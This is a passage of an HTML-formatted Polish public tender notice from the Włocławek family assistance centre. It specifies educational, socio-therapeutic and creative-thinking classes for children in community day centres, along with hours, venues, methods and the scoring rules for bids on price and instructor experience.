Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zajęcia pt. „Mały odkrywca” zwiększające wiedzę i<br/>umiejętności w zakresie nauk ścisłych, w Świetlicach środowiskowych „Zorza” i „Zefir”,<br/>prowadzonych przez Miejski Ośrodek Pomocy Rodzinie we Włocławku.<br/>a. zajęcia „Mały odkrywca” zwiększające możliwości i rozwój zdolności w zakresie nauk ścisłych<br/>u dzieci - zajęcia indywidualne i zajęcia grupowe realizowane w zależności od potrzeb<br/>uczestników, zajecie wspierające ogólny rozwój młodych beneficjentów, ze szczególnym<br/>nastawieniem na rozwój zainteresowania naukami ścisłymi – fizyką, matematyką, chemią,<br/>zajęcia wspierające rozwój logicznego i konstruktywnego myślenia, rozwój naturalnej pasji<br/>odkrywania świata poprzez m.in. ciekawe eksperymenty fizyczne, ukazanie zjawisk z<br/>najbliższego otoczenia, ciekawostki geometryczne, liczbowe.<br/>b. termin świadczenia usług: od dnia podpisania umowy do dnia 29 grudnia 2022r. -<br/>szczegółowy harmonogram świadczenia usług zostanie ustalony przed podpisaniem umowy z<br/>wykonawcą, usługi świadczone będą zgodnie z zapotrzebowaniem odbiorców wsparcia, w dni<br/>robocze.<br/>c. zajęcia pt. „Mały odkrywca” –zwiększające wiedzę i umiejętności w zakresie nauk ścisłych w<br/>Świetlicy środowiskowej „Zorza” MOPR Włocławek:<br/>- liczba godzin w 2021r. -240 godzin,<br/>- liczba godzin w 2022r.-200 godzin,<br/>d. zajęcia pt. „Mały odkrywca” – zwiększające wiedzę i umiejętności w zakresie nauk ścisłych w<br/>Świetlicy środowiskowej „Zefir” MOPR Włocławek:<br/>- liczba godzin w 2021r. –240 godzin,<br/>- liczba godzin w 2022r.- 200 godzin,<br/>e. odbiorcy zajęć: dzieci i młodzież w wieku od 6 do 16 lat uczęszczające do świetlicy<br/>środowiskowej;<br/>f. zajęcia indywidualne lub grupowe- w zależności od potrzeb uczestników, ogólna liczba osób w<br/>obu świetlicach objętych zajęciami min. 30 osób;<br/>g. miejsce świadczenia usługi (wariant I):<br/>- Świetlica Środowiskowa „Zorza” ul. Żytnia 58, 87-800 Włocławek<br/>- Świetlica środowiskowa „Zefir” ul. Kaliska 7,<br/>87-800 Włocławek.<br/>h. W razie potrzeby zajęcia mogą odbywać się w innym miejscu, niż wymienione w pkt g,<br/>wskazanym przez zamawiającego.<br/>i. Zamawiający przewiduje możliwość przeprowadzenie zajęć w formie zdalnej (wariant II) za<br/>pośrednictwem ogólnodostępnych komunikatorów np. Skype, Messenger, Whatsapp, Zoom, w<br/>sytuacji wynikającej z działania siły wyższej, tj. zdarzeń losowych takich jak: pożar, powódź, atak<br/>terrorystyczny, klęski żywiołowe, pandemie, epidemie.<br/>j. tematyka zajęć :<br/>- nadrabianie zaległości w programie nauczania z zakresu przedmiotów: matematyka, chemia,<br/>fizyka,<br/>- zapoznanie z zagadnieniami wykraczającymi poza program nauczania,<br/>- zajęcia rozwijające logiczne myślenie, wyobraźnię,<br/>- poznawanie ciekawostek z otaczającego nas świata, z zakresu fizyki, chemii, matematyki.<br/>k. tematyka zajęć dostosowana do wieku i umiejętności dzieci i młodzieży biorących udział w<br/>zajęciach;<br/>l. metody dydaktyczne:<br/>- metody słowne,<br/>- metody oglądowe,<br/>- metody praktyczne,<br/>- metody gier dydaktycznych.<br/>m. Wykonawca zapewni niezbędne narzędzia i sprzęt do prawidłowej realizacji usług w ramach<br/>przedmiotu, m.in.:<br/>- sprzęt komputerowy, nagłaśniający, rzutnik,<br/>- materiały i pomoce dydaktyczne niezbędne do prowadzenia zajęć (artykuły papiernicze,<br/>piśmiennicze, książki, zdjęcia, filmy)<br/>n. w przypadku realizacji zajęć w formie zdalnej Wykonawca nie zapewnia sprzętu uczestnikom<br/>zajęć;<br/>o. efekty zajęć:<br/>- podniesienie wiedzy i umiejętności w zakresie matematyki, fizyki i chemii,<br/>- nadrobienie zaległości,<br/>- pomoc w odrabianiu lekcji w zakresie matematyki, fizyki i chemii,<br/>- przygotowanie do testów/sprawdzianów.,<br/>- Rozwój logicznego i konstruktywnego myślenia,<br/>- wzrost zainteresowania dzieci fizyką, matematyką, chemią.<br/>p. z każdego dnia zajęć wykonawca zobowiązany jest sporządzać listę obecności uczestników<br/>oraz sprawozdanie miesięczne wg wzoru określonego przez Zamawiającego . </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80100000-5 - Usługi szkolnictwa podstawowego</p> <p class="mb-0">80310000-0 - Usługi edukacji młodzieży</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">- zajęcia pt. „Mały odkrywca” –zwiększające wiedzę i umiejętności w zakresie nauk<br/>ścisłych w Świetlicy środowiskowej „Zorza” MOPR Włocławek – 220 godzin,<br/>- zajęcia pt. „Mały odkrywca” – zwiększające wiedzę i umiejętności w zakresie nauk ścisłych w<br/>Świetlicy środowiskowej „Zefir” MOPR Włocławek – 220 godzin,<br/>- charakterystyka zajęć zgodna z opisem przedmiotu zamówienia w rozdziale V pkt 6 SIWZ,<br/>- warunki realizacji zgodnie z postanowieniami projektu umowy załączonego do niniejszej SIWZ</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>1) CZĘŚĆ II: „Całkowita cena oferty brutto” – C = (C1 + C2)/2<br/>Gdzie:<br/>C – całkowita cena oferty brutto<br/>C1 – cena oferty za wariant I zamówienia, czyli za zajęcia w formie stacjonarnej<br/>C2 – cena oferty za wariant II zamówienia, czy za zajęcia w formie zdalnej<br/>Cena najtańszej oferty<br/>C = ------------------------------------- x 60 pkt<br/>Cena badanej oferty<br/>2) CZĘŚĆ II: „Doświadczenie osoby prowadzącej zajęcia” – D = Dm +Dch + Df<br/>Gdzie:<br/>Dm – doświadczenie osób prowadzących zajęcia z matematyki<br/>Dch – doświadczenie osób prowadzących zajęcia z chemii<br/>Df – doświadczenie osób prowadzących zajęcia z fizyki<br/>Dm:<br/>0-3 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie matematyki<br/>– 0 pkt<br/>Powyżej 3 do 5 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie<br/>matematyki – 5 pkt<br/>Powyżej 5 lat do 7 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w<br/>zakresie matematyki – 10 pkt<br/>Powyżej 7 lat do 9 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w<br/>zakresie matematyki – 15 pkt<br/>Powyżej 9 lat doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie matematyki –<br/>20 pkt<br/>Dch:<br/>0-3 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie chemii – 0<br/>pkt<br/>Powyżej 3 do 5 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie<br/>chemii – 5 pkt<br/>Powyżej 5 lat doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie chemii – 10<br/>pkt<br/>Df:<br/>0-3 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie fizyki – 0 pkt<br/>Powyżej 3 do 5 lat włącznie doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie<br/>fizyki – 5 pkt<br/>Powyżej 5 lat doświadczenia w pracy z dziećmi o charakterze dydaktycznym w zakresie fizyki – 10 pkt<br/>3. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru:<br/>L = C + D<br/>gdzie L to całkowita liczba punktów.<br/>4. Ocena punktowa w kryterium „Całkowita cena oferty brutto” dokonana zostanie na podstawie<br/>całkowitej ceny oferty brutto, wyliczonej jako średnia z sumy ceny za realizację zamówienia w formie<br/>stacjonarnej (wariant I) i ceny za realizację zamówienia w formie zdalnej (wariant II), wskazanej przez<br/>Wykonawcę w formularzu ofertowym i przeliczona według wzoru opisanego w tabeli powyżej.<br/>6. Ocena punktowa w kryterium „Doświadczenie osoby prowadzącej zajęcia” dokonana zostanie,<br/>zgodnie z zasadami opisanymi w tabeli powyżej, na podstawie podanych przez Wykonawcę w<br/>formularzu ofertowym informacji, dotyczących doświadczenia osoby wyznaczonej do realizacji<br/>zamówienia.<br/>7. Niewskazanie w formularzu ofertowym żadnej osoby, o której mowa w pkt. 6, spowoduje odrzucenie<br/>oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>8. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do<br/>dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>9. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby prowadzącej zajęcia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zajęcia socjoterapeutyczne w Świetlicach środowiskowych<br/>„Zachęta” i ‘”Zacisze” prowadzonych przez Miejski Ośrodek Pomocy Rodzinie we Włocławku.<br/>a. cykl zajęć dla dzieci i młodzieży w wieku 6-16 lat, przebywających w pieczy zastępczej oraz z<br/>rodzin przeżywających trudności w pełnieniu funkcji opiekuńczo – wychowawczych;<br/>b. głównym celem zajęć jest podniesienie kompetencji społecznych uczestników- rozumienie<br/>kontaktu społecznego- zdolność rozwiązywania konfliktów, komunikowania się, budowanie<br/>własnej samooceny, umiejętność wyrażania uczuć, swoich potrzeb i oczekiwań, uczestnicy<br/>powinni zostać wyposażeni w wiedzę i umiejętności, dzięki którym zdobędą kompetencje pozwalające na dostosowanie się do zasad społecznych;<br/>c. termin świadczenia usług: od dnia podpisania umowy do dnia 29 grudnia 2022r., szczegółowy<br/>harmonogram świadczenia usług zostanie ustalony przed podpisaniem umowy z wykonawcą,<br/>usługi świadczone będą zgodnie z zapotrzebowaniem odbiorców wsparcia, w dni robocze;<br/>d. zajęcia socjoterapeutyczne w Świetlicy środowiskowej „Zachęta” MOPR Włocławek:<br/>- liczba godzin w 2021r. –120 godzin<br/>- liczba godzin w 2022r.- 100 godzin<br/>e. zajęcia socjoterapeutyczne w Świetlicy środowiskowej „Zacisze” MOPR Włocławek:<br/>- Liczba godzin w 2021r. –120 godzin<br/>- Liczba godzin w 2022r.- 100 godzin<br/>f. odbiorcy usługi: dzieci i młodzież w wieku od 6 do 16 lat przebywające<br/>w pieczy zastępczej oraz z rodzin naturalnych z problemami opiekuńczo-wychowawczymi i<br/>uczęszczające do świetlicy środowiskowej;<br/>g. liczba osób biorących udział w zajęciach : zajęcia grupowe - ogólna liczba osób w obu<br/>świetlicach objętych zajęciami min. 30 osób;<br/>h. miejsce świadczenia usług:<br/>- Świetlica środowiskowa „Zachęta” ul. Wieniecka 42, 87-800 Włocławek,<br/>- Świetlica środowiskowa „Zacisze” ul. Zakręt 8 , 87-800 Włocławek,<br/>- w razie potrzeby zajęcia mogą odbywać się w innym miejscu wskazanym przez<br/>zamawiającego,<br/>i. nie dopuszcza się świadczenia usług w formie zdalnej,<br/>j. przykładowe tematy zajęć, związane z prawidłowym funkcjonowaniem w społeczeństwie:<br/>- Integracja,<br/>- wzajemne poznanie,<br/>- budowanie pozytywnej samooceny,<br/>- role społeczne,<br/>- uczucia,<br/>- rozwiązywanie konfliktów,<br/>- radzenie sobie ze stresem,<br/>- umiejętności podejmowani samodzielnych decyzji i brania za nie odpowiedzialności,<br/>- przełamywanie nieśmiałości,<br/>- asertywność,<br/>- zajęcia mające na celu odreagowanie agresji i nagromadzonych w dziecku emocji,<br/>wyładowanie stresu,<br/>k. treści powinny być przygotowane i przekazywane w sposób właściwy dla wieku i możliwości<br/>uczestników zajęć,<br/>l. tematyka zajęć może ulec zmianie, zostać poszerzona lub zawężona – w zależności od<br/>potrzeb uczestników.<br/>m. Metody dydaktyczne, m.in.:<br/>- ćwiczenia i zabawy integracyjne,<br/>- psychodrama, burza mózgów,<br/>- swobodna ekspresja słowna,<br/>- metody pracy nad zachowaniem,<br/>- metody utrwalania,<br/>- muzykoterapia,<br/>- arteterapia,<br/>- wybór konkretnych metod nastąpi w porozumieniu z Zamawiającym.<br/>n. wyposażenie techniczne i sprzęt: Wykonawca zapewni niezbędne narzędzia i sprzęt do<br/>prawidłowej realizacji usług w ramach przedmiotu:<br/>- materiały pomocnicze tj. m.in. kartki, brystol, artykuły piśmiennicze, nożyczki, klej, piłki, balony,<br/>artykuły animacyjne,<br/>- sprzęt komputerowy, nagłaśniający, rzutnik;<br/>o. efekty zajęć:<br/>- podniesienie umiejętności społecznych i komunikacyjnych,<br/>- umiejętność właściwego odreagowania napięć emocjonalnych,<br/>- zbudowanie poczucia bezpieczeństwa i zaufania do otaczających osób,<br/>- umiejętność dostrzegania potrzeb własnych i drugiego człowieka,<br/>- umiejętności interpersonalne,<br/>- umiejętność pełnienia ról społecznych;<br/>p. Wykonawca wystawi zaświadczenie uczestnictwa w zajęciach dla wszystkich uczestników z<br/>wyszczególnieniem liczby godzin, zakresu poruszanych zagadnień oraz doskonalonych<br/>umiejętności, osiągniętych efektów;<br/>q. Z każdego dnia zajęć zostanie sporządzona lista obecności uczestników. Wykonawca musi<br/>przygotować sprawozdanie miesięczne – wg wzoru określonego przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312320-8 - Usługi doradztwa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">- zajęcia socjoterapeutyczne w Świetlicy środowiskowej „Zachęta” MOPR Włocławek – 110<br/>godzin<br/>- zajęcia socjoterapeutyczne w Świetlicy środowiskowej „Zacisze” MOPR Włocławek – 110 godzin<br/>- charakterystyka zajęć zgodna z opisem przedmiotu zamówienia w rozdziale V pkt 7 SIWZ,<br/>- warunki realizacji zgodnie z postanowieniami projektu umowy załączonego do niniejszej SIWZ</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>1) „Całkowita cena oferty brutto” – C<br/>Cena najtańszej oferty<br/>C = ------------------------------------- x 60 pkt<br/>Cena badanej oferty<br/>2) „Doświadczenie osoby prowadzącej zajęcia” – D;<br/>0-3 lat włącznie doświadczenia w pracy z rodziną i dzieckiem z zakresu socjoterapii – 0 pkt<br/>Powyżej 3 do 5 lat włącznie doświadczenia w pracy z rodziną i dzieckiem z zakresu socjoterapii – 10<br/>pkt<br/>Powyżej 5 lat do 7 lat włącznie doświadczenia w pracy z rodziną i dzieckiem z zakresu socjoterapii –<br/>20 pkt<br/>Powyżej 7 lat do 9 lat włącznie doświadczenia w pracy z rodziną i dzieckiem z zakresu socjoterapii –<br/>30 pkt<br/>Powyżej 9 lat doświadczenia w pracy z rodziną i dzieckiem z zakresu socjoterapii – 40 pkt<br/>3. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru:<br/>L = C + D<br/>gdzie L to całkowita liczba punktów.<br/>5. Ocena punktowa w kryterium „Całkowita cena oferty brutto” dokonana zostanie na podstawie<br/>całkowitej ceny oferty brutto, wskazanej przez Wykonawcę w formularzu ofertowym i przeliczona<br/>według wzoru opisanego w tabeli powyżej.<br/>6. Ocena punktowa w kryterium „Doświadczenie osoby prowadzącej zajęcia” dokonana zostanie,<br/>zgodnie z zasadami opisanymi w tabeli powyżej, na podstawie podanych przez Wykonawcę w<br/>formularzu ofertowym informacji, dotyczących doświadczenia osoby wyznaczonej do realizacji zamówienia.<br/>7. Niewskazanie w formularzu ofertowym żadnej osoby, o której mowa w pkt. 6, spowoduje odrzucenie<br/>oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>8. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do<br/>dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>9. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby prowadzącej zajęcia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Warsztaty podnoszące kompetencje społeczne i<br/>warsztaty twórczego myślenia w Świetlicach środowiskowych „Zorza” i „Zefir prowadzonych<br/>przez Miejski Ośrodek Pomocy Rodzinie we Włocławku.<br/>a. cykl zajęć dla dzieci i młodzieży, który ma celu podnieść kompetencje społeczne i rozwinąć<br/>twórcze kreatywne myślenie.<br/>b. Zajęcia z zakresu rozwoju społecznego - umiejętność współpracy, pracy w grupach,<br/>komunikacji, tworzenie prawidłowych relacji społecznych, poznawania własnych: mocnych i<br/>słabych stron, autoprezentacji, poznawania własnych predyspozycji i zainteresowań;<br/>c. Warsztaty twórczego myślenia – rozwijanie potencjału twórczego u dzieci, wyobraźni,<br/>pobudzenie motywacji do działania i nauki , rozwój niekonwencjonalnego myślenia i<br/>spontaniczności w wyrażaniu siebie , swoich pomysłów i rozwiązywania problemów;<br/>d. termin świadczenia usług: od dnia podpisania umowy do 29 grudnia 2022r., szczegółowy<br/>harmonogram świadczenia usług zostanie ustalony przed podpisaniem umowy z wykonawcą,<br/>usługi świadczone będą zgodnie z zapotrzebowaniem odbiorców wsparcia, w dni robocze;<br/>e. warsztaty podnoszące kompetencje społeczne i warsztaty twórczego myślenia w Świetlicy<br/>środowiskowej „Zorza” MOPR Włocławek:<br/>- liczba godzin w 2021r. -120 godzin,<br/>- liczba godzin w 2022r.-100 godzin;<br/>f. warsztaty podnoszące kompetencje społeczne i warsztaty twórczego myślenia w Świetlicy<br/>środowiskowej „Zefir” MOPR Włocławek:<br/>- liczba godzin w 2021r. –120 godzin,<br/>- liczba godzin w 2022r.- 100 godzin;<br/>g. odbiorcy usługi: dzieci i młodzież w wieku od 6 do 16 lat przebywające w rodzinnej pieczy zastępczej oraz z rodzin naturalnych<br/>z problemami opiekuńczo-wychowawczymi i uczęszczające do świetlicy środowiskowej;<br/>h. zajęcia grupowe, ogólna liczba osób w obu świetlicach objętych zajęciami- min. 30 osób;<br/>i. miejsce świadczenia usługi:<br/>- Świetlica Środowiskowa „Zorza” ul. Żytnia 58, 87-800 Włocławek,<br/>- Świetlica środowiskowa „Zefir” ul. Kaliska 7, 87-800 Włocławek.<br/>- w razie potrzeby zajęcia mogą odbywać się w innym miejscu wskazanym przez<br/>zamawiającego;<br/>j. nie dopuszcza się świadczenia usług w formie zdalnej,<br/>k. tematyka zajęć: powinna obejmować zapewnić uczestnikom podniesienie szeroko<br/>rozumianych kompetencji społecznych oraz rozwinąć kreatywność uczestników:<br/>- wyszukiwanie zainteresowań,<br/>- kreatywne spędzanie czasu wolnego,<br/>- poznawanie własnych możliwości i predyspozycji,<br/>- nauka tolerancji i akceptacji drugiego człowieka,<br/>- poznanie zasad współpracy i współdziałania,<br/>- umiejętności wytyczania celu,<br/>- odreagowanie emocji,<br/>- rozwiązywania problemów, trudnych sytuacji,<br/>- umiejętność kreatywnego myślenia,<br/>- zdolność pobudzenia motywacji do działania,<br/>- niekonwencjonalne myślenie,<br/>- umiejętność przyjmowania i wyrażania konstruktywnej krytyki,<br/>- umiejętność radzenia sobie ze stresem,<br/>- treści powinny być przygotowane i przekazywane w sposób właściwy dla wieku i możliwości<br/>uczestników zajęć,<br/>- tematyka zajęć może ulec zmianie, zostać poszerzona lub zawężona – w zależności od<br/>potrzeb uczestników;<br/>l. metody dydaktyczne:<br/>- ćwiczenia i zabawy integracyjne,<br/>- psychodrama,<br/>- burza mózgów,<br/>- swobodna ekspresja słowna,<br/>- metody pracy nad zachowaniem,<br/>- metody utrwalania,<br/>- muzykoterapia,<br/>- arteterapia,<br/>- wybór konkretnych metod nastąpi w porozumieniu z Zamawiającym;<br/>m. wyposażenie techniczne i sprzęt: Wykonawca zapewni niezbędne narzędzia i sprzęt do<br/>prawidłowej realizacji usług w ramach przedmiotu:<br/>- materiały pomocnicze tj. m.in. kartki, brystol, artykuły piśmiennicze, nożyczki, klej, piłki, balony,<br/>artykuły animacyjne,<br/>- sprzęt komputerowy, nagłaśniający, rzutnik;<br/>n. efekty zajęć:<br/>- podniesienie umiejętności społecznych i komunikacyjnych,<br/>- umiejętność właściwego odreagowania napięć emocjonalnych,<br/>- zbudowanie poczucia bezpieczeństwa i zaufania do otaczających osób,<br/>- umiejętność dostrzegania potrzeb własnych i drugiego człowieka,<br/>- umiejętności interpersonalne,<br/>- umiejętność pełnienia ról społecznych;<br/>o. wykonawca wystawi zaświadczenie uczestnictwa w zajęciach dla wszystkich uczestników z<br/>wyszczególnieniem liczby godzin, zakresu poruszanych zagadnień oraz doskonalonych<br/>umiejętności, osiągniętych efektów;<br/>p. każdego dnia zajęć zostanie sporządzona lista obecności uczestników, Wykonawca musi przygotować sprawozdanie miesięczne – wg wzoru określonego przez Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">85312320-8 - Usługi doradztwa</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-29</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">- warsztaty podnoszące kompetencje społeczne i warsztaty twórczego myślenia w<br/>Świetlicy środowiskowej „Zorza” MOPR Włocławek – 110 godzin,<br/>- warsztaty podnoszące kompetencje społeczne i warsztaty twórczego myślenia w Świetlicy<br/>środowiskowej „Zefir” MOPR Włocławek – 110 godzinl,<br/>- charakterystyka zajęć zgodna z opisem przedmiotu zamówienia w rozdziale V pkt 8 SIWZ,<br/>- warunki realizacji zgodnie z postanowieniami projektu umowy załączonego do niniejszej SIWZ.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Za ofertę najkorzystniejszą zostanie uznana oferta zawierająca<br/>najkorzystniejszy bilans punktów w kryteriach:<br/>1) „Całkowita cena oferty brutto” – C<br/>Cena najtańszej oferty<br/>C = ------------------------------------- x 60 pkt<br/>Cena badanej oferty<br/>2) „Doświadczenie osoby prowadzącej zajęcia” – D;<br/>0-3 lat włącznie doświadczenia w pracy z rodziną i dzieckiem z zakresu socjoterapii – 0 pkt<br/>Powyżej 3 do 5 lat włącznie doświadczenia w pracy z rodziną i dzieckiem z zakresu socjoterapii – 10<br/>pkt<br/>Powyżej 5 lat do 7 lat włącznie doświadczenia w pracy z rodziną i dzieckiem z zakresu socjoterapii –<br/>20 pkt<br/>Powyżej 7 lat do 9 lat włącznie doświadczenia w pracy z rodziną i dzieckiem z zakresu socjoterapii –<br/>30 pkt<br/>Powyżej 9 lat doświadczenia w pracy z rodziną i dzieckiem z zakresu socjoterapii – 40 pkt<br/>3. Całkowita liczba punktów, jaką otrzyma dana oferta, zostanie obliczona według poniższego wzoru:<br/>L = C + D<br/>gdzie L to całkowita liczba punktów.<br/>5. Ocena punktowa w kryterium „Całkowita cena oferty brutto” dokonana zostanie na podstawie<br/>całkowitej ceny oferty brutto, wskazanej przez Wykonawcę w formularzu ofertowym i przeliczona<br/>według wzoru opisanego w tabeli powyżej.<br/>6. Ocena punktowa w kryterium „Doświadczenie osoby prowadzącej zajęcia” dokonana zostanie,<br/>zgodnie z zasadami opisanymi w tabeli powyżej, na podstawie podanych przez Wykonawcę w<br/>formularzu ofertowym informacji, dotyczących doświadczenia osoby wyznaczonej do realizacji<br/>zamówienia.<br/>7. Niewskazanie w formularzu ofertowym żadnej osoby, o której mowa w pkt. 6, spowoduje odrzucenie<br/>oferty na podstawie art. 226 ust. 1 pkt 5 ustawy Pzp.<br/>8. Punktacja przyznawana ofertom w poszczególnych kryteriach będzie liczona z dokładnością do<br/>dwóch miejsc po przecinku. Najwyższa liczba punktów wyznaczy najkorzystniejszą ofertę.<br/>9. Zamawiający udzieli zamówienia Wykonawcy, którego oferta odpowiadać będzie wszystkim<br/>wymaganiom przedstawionym w ustawie Pzp oraz w SWZ i zostanie oceniona jako najkorzystniejsza w<br/>oparciu o podane kryteria wyboru.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osoby prowadzącej zajęcia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span 